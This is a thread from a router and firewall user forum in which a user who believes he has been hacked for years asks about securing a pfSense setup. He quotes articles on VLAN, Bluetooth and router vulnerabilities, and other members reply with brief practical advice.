6100 + Zen FTTP (UK) + NordVPN Setup

bworks

@nogbadthebad Thanks! So years ago supposedly there were "no rootkits on Macs", of course "no malware", "router cannot be hacked whatsoever", etc.

I basically completely gave up trying & just accepted the situation (at this stage I think it's just a running meme, to keep hacking me until I'm x...)

However returning to the situation once again, it's likely I have the rootkit right now. What's the best way to detect it? I've installed Snort a long time ago and didn't find anything suspicious (or I don't know maybe I missed something). But I installed it on my Mac, not my Sky router that at the time couldn't even be changed to an external one.

If I get a new router and install Snort on it, then connect this Mac, will it then [finally] find something?

Or will the hackers just simply switch it off when they know I'm looking for it?

bworks

If anyone else comes across this in the future - I believe the only truly safe way is a combination with Chromebooks/extensions (that are much less likely to get malware).

https://cryptonews.com/news/trader-s-lesson-why-you-shouldn-t-keep-large-amounts-of-cry-9302.htm

"If you MUST use it, buy a Chromebook and a hardware wallet and use them STRICTLY for Metamask."

"According to him, while a Chromebook limits what can be installed on one’s computer, it still allows installation for potentially malicious browser plugins, so one must beware of installing them." (this is not really a big deal).

I will have to get a separate Mac for music software for 99.9% security, as so much is third party - but this will never connect to my router (I will block it) - damn Bluetooth is so nice but I can hard wire everything I think. And I will use a VPN to access my accounts & downloads to protect my IP, just in case.

Surely this is ultra-secure (with a UTM setup on main router/firewall)? Am I missing anything? New Macbook somehow gets malware, then it's isolated (like a VM, but hardware), and I can check the 'UTM' traffic with Chromebook. Crypto/NFT/MetaMask on Chromebook. 100% secure?

bworks

Ah yes I was missing VLANs!

https://www.routersecurity.org/vlan.php

"On a home network, the protection offered by isolating these devices is to minimize the impact of a hacked device. Likewise, a malware infested Windows machine can't spread its tentacles, if it can't see any other devices or computers."

This is clearly what happened to me & my family, where it was impossible to escape the hackers, despite spending thousands on buying new devices & changing ISPs. At the same time if I'd been able to invest that money in the cryptos & NFTs I wanted to (knowing the potential), I'd have around $6 billion, instead of being practically homeless.

Thanks @nogbadthebad for leading me on the right path.

bworks

And also as is proven here, it's very rare to actually find help.

Especially when someone claims/knows that they have been hacked for many years, yet they are constantly branded "delusional" & "crazy", especially if they own a Mac.

Back then I had phone calls with security experts where there was nothing they could do, "not possible", etc. All anyone was interested in is whether they stole any money.

But I guess there are much worse failures to act in this parasitic $hi hole world, so I should just count myself lucky & "stop going on about it" or "just ignore them"?

bworks

Well apparently all of that still won't be enough to stop them, according to the memes [puke]!

And yes... I see an issue with Zen sending out the PPPoE username & password via "email", which I cannot receive on a secure network bec. they are hacking everyone I know, and I can't even order it securely. Although hopefully/surely there is a way that Zen support can help with that over the phone...

Secondly it could be due to the use of VLANs, e.g.
https://security.stackexchange.com/questions/238796/what-are-the-security-issues-can-be-exploited-to-vlan-switches-to-compromise-net

"As an abstraction, the operation of a managed switch can be described with three planes:

Management plane used to configure the switch (SSH, HTTP...).
Control plane that controls how the packets should be forwarded (L2) or routed (L3). It can learn from MAC addresses from the packets it sees and there are protocols swithes can use to share information, prevent loops (spanning-tree) or handle shortest routing paths (OSPF).
Data plane or forwarding plane that does the actual switching job.
Leaving aside the possible software vulnerabilities in the switch itself, the main issue remains how well the control plane and the management plane are protected from the data forwarded in the data plane. The data plane handles also all the control plane protocol traffic between the switches, and if the packet seen must be processed by the control plane, forwards the packet to it.

In a secure configuration, every access port can only see the traffic inside its own VLAN, and the switch should not accept any control plane protocol traffic from them. If any of these protocols is open on an access port, an attacker connected to it might mimic another switch and

jailbreak from its own VLAN e.g. by

becoming a spanning-tree root or a node with MitM position.
activating trunking on the port and seeing all traffic with 802.1Q tags (DTP, VTP, HSRP...)
cause DoS attacks e.g. by flooding CDP table, or flooding any BPDUs that will cause too much processing on the control plane, exhausting its resources
disable 802.1Q VLANs altogether, making all networks see each other (VTP).
Yersinia is a tool that automates all these tricks...

The management plane must be secured, because by altering the configuration its possible to remove any lower plane restrictions the port has. Ideally, you'd have a separated management VLAN altogether."

Since I am not a computer science degree university student, I'm not educated enough to understand how to stop them.

Just unbelievable really how there's not a better/consumer way to stay safe!? Normal people don't stand a chance.

bworks

@nogbadthebad Uff, do you have any idea what all of this means?

https://oneplus-x.github.io/2017/02/25/ISP-Hacking/

"What can ISPs do?
Enforce stronger authentication mechanisms like PPPoE-CHAP, with a strong password policy for the same."

In my previous home, there was an incident where someone took the fiber box off the outside wall & did something suspicious!!! I actually saw 'him' when he stood up right at the window then walked off. I thought WTF? Then when I went outside the box/cover was off the wall & on the floor!?

I thought, and apparently according to everyone, nothing can be done to physically hack that way, such as connecting some kind of device, can they? F*kin insane what I've been through!

Even having to deal with 2 family deaths, clearly extreme PTSD (ongoing), health issues - nothing will stop these parasitic psychopaths! It's one big hilarious game to them, with endless memes or "lulz"............

NogBadTheBad

@bworks said in 6100 + Zen FTTP (UK) + NordVPN Setup:

https://oneplus-x.github.io/2017/02/25/ISP-Hacking/

Not a clue, I'm not an ISP

bworks

@nogbadthebad Well I will have to get the cyber security experts in to figure this out, I guess.

Back in the day there was practically no one, other than starting prices of $300K for massive companies (and even them telling me things were impossible that have been proven today).

All of this that has been 100% confirmed was supposedly "impossible" back then:
https://www.theweek.co.uk/news/uk-news/952744/outdated-internet-routers-put-millions-at-risk-of-being-hacked

Every single expert said no malware or anything for Macs.

All of the security experts need to realise that these underground hacking gangs have their own little secrets. Look now, literally everything that was "impossible" has been proven. Even iPhones hacked into. The info comes out years down the line.

stephenw10

@bworks said in 6100 + Zen FTTP (UK) + NordVPN Setup:

https://oneplus-x.github.io/2017/02/25/ISP-Hacking/

That only really applies to an apartment building scenario as described. If you're using FTTC (VDSL) you are not in a broadcast domain like that. FTTP (GPON) is also not that though without testing it I'm unsure what you would see there. doubt you could MITM the PPP session though.
If you're on BT for example they use the same password for all clients, you don't actually need a password. You are authenticated by connecting from the right line so the PPP credentials are unimportant.

Steve

bworks

@stephenw10 thanks! I agree it's probably a secure part of the network - but can't say 100% anymore.

There's likely another way they are thinking about...

There are ‘bugs’ in every single software! That’s why there are endless “security updates” / “make sure you install the latest firmware updates”, blah blah blah.

The fact is the software has already had the bug(s) long before the updates! And only ethical hackers are reporting them.

Check out this:
https://routersecurity.org/bugs.php

The bug that scares me the most is the one that allows bad guys to bypass a router firewall and attack devices directly. He tested four consumer routers and found two were vulnerable, but he did not name names and did not say which of the 12 bugs they were vulnerable to.

“Bugs bugs bugs………”

2 years Virgin Media does nothing (I’ve been with them in the past)

Even Fortinet/Fortigate bugs / Cisco “backdoor account”, “flaw leaves small business networks wide open”

What is the history of “bugs” on Netgate hardware / PFSense?

Unfortunately as soon as there are any single flaws in the software, that's it. I'm not waiting for the hackers to come along.

bworks

And there goes "bluetooth is invincible" / "impossible" as well:

"Millions of Wi-Fi access points sold by Cisco, Meraki, and Aruba a critical Bluetooth bug that could allow attackers to run install and run malware on the devices. The bug was found by Armis. The malware could get access to all subnets, that is, it would not be stopped by a VLAN. The bug is in Bluetooth Low Energy (BLE), in software from Texas Instruments and they were aware of the issue, but they were not aware that it could be exploited in such a malicious manner."

"Not me, Bluetooth is always disabled on my phone."

"Way to go Aruba. An attacker can learn the password by sniffing a legitimate update or reverse-engineering the device. Game over. Bad guys can then install any firmware they want."

"Tin foil hat: a reader comment at Ars raised an issue that I first heard at a security conference this past summer. What if the removal of 3.5 mm audio ports in phones was to force more people to keep Bluetooth enabled, and thus, keep them traceable?

If that is true, we won't know for at least 30 years."

bworks

And regarding bluetooth, my iPhone tries to connect to my Bose speakers fairly frequently, despite the speakers being turned off (with no battery) & the bluetooth turned off on my iPhone!!!

bworks

"Decade-long vulnerability in multiple routers could allow network compromise"

Just utterly ridiculous! Clearly there is something malicious going on behind the scenes also. They don't care a less about the hackers [ruining lives] that are using their hidden backdoors. Only when money is stolen & there's something to trace.

In the meantime governments around the world hacking innocent individuals, destroying lives, all to keep control / bully the innocent people.

stephenw10

Well pfSense has no Bluetooth support at all so that's one thing not to worry about.

It depends what you mean by 'bug'. You can check the entire bug history of you want here:
https://redmine.pfsense.org/projects/pfsense/issues
Most of that are not security issue though. What you probably want is this:
https://docs.netgate.com/advisories/index.html

Steve

bworks

@stephenw10 thanks Stephen! On the first document I found:

Due to the lack of proper encoding on the affected parameters susceptible to XSS, arbitrary JavaScript could be executed in the user's browser. The user's session cookie or other information from the session may be compromised.

• Do not log into the firewall with the same browser used for non-administrative web browsing.

My plan is to use a dedicated Chromebook just for accessing the router.

I will go through the list for more potential tips...

I'll say I think it's better to go with open source than commercial due to these entities possibly creating backdoors on purpose & keeping them secret for as long as possible. I don't see the same thing happening with open source.

bworks

@stephenw10 holy crap, well there you go:

Researchers at the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University have independently identified vulnerabilities related to Cross-Transport Key Derivation (CTKD) in implementations supporting pairing and encryption with both Bluetooth BR/EDR and LE in Bluetooth Specifications 4.0 through 5.0 […]

For this attack to be successful, an attacking device would need to be within wireless range of a vulnerable Bluetooth device supporting both BR/EDR and LE transports that supports CTKD between the transports and permits pairing on either the BR/EDR or LE transport either with no authentication (e.g. JustWorks) or no user-controlled access restrictions on the availability of pairing. If a device spoofing another device’s identity becomes paired or bonded on a transport and CTKD is used to derive a key which then overwrites a pre-existing key of greater strength or that was created using authentication, then access to authenticated services may occur. This may permit a Man In The Middle (MITM) attack between devices previously bonded using authenticated pairing when those peer devices are both vulnerable.

"Vulnerability to so-called Man-In-The-Middle (MITM) attacks is less clear. With some of these, an attacker can impersonate a previously paired device, which would then be allowed to connect without user intervention"
https://9to5mac.com/2020/09/10/bluetooth-security-flaw-2/

Seems to be exactly what was/is happening to my iPhone.

My bet is, despite bluetooth being secure, Apple are leaving backdoors in, and underground hacker gangs are finding these out & keeping the flaws to themselves. These vulnerabilities stay secret for years (or a "decade").

stephenw10

There is always a trade-off between security and convenience. You just have to realise that the vast majority of users are at the convenience end of that scale and manufacturers are targeting mostly those users....

But that's a conversation for 'off-topic' it's not Netgate hardware related.

Steve

bworks

@stephenw10 so what would you suggest as the most secure setup that I can create [with the Netgate/PFSense router]?

Again, my plan is 1 Chromebook solely for configuring the router (if the Chromebook can remain offline whilst configuring that would be better...).

2nd Chromebook for web browsing, and accessing my web hosts - shouldn't be able to get malware but not sure what other vulnerabilities there are - e.g. turn off javascript?...

And a Macbook Pro for all of my actual works (Adobe, AE plugins, Music plugins, etc.) - only use the internet to install the programs (many 3rd party), and install updates. Keep the internet off as much as possible. Send my web development assets to the cloud rather than accessing my web hosting directly (where my passwords may be exposed some how).

I still can't see myself being able to invest in crypto/NFTs, even with a dedicated Chromebook for it...
Unless, is there a way to detect any sort of hack, not just malware? How do so many big companies go for so long without realising they are being hacked? Aren't they monitoring their outgoing traffic (e.g. through Snort, etc.)?

Obviously no bluetooth on devices, no wireless devices (no wifi at all), VLANs, VPN... what about ACLs with PFSense, do they increase security?

bworks

Hmm, well doesn't appear that Snort be useful since I can't remember the last time I visited a non-https website, and it does nothing for an encrypted connection.

stephenw10

The concept of an off-line Chromebook is probably not going to work well. ChromeOS expects to always be online.
If you're aiming at the secure end of the security/convenience scale use Tails. It is quite inconvenient though.

Again though this is not really specific to the 6100 so it would be better in a different thread.

Steve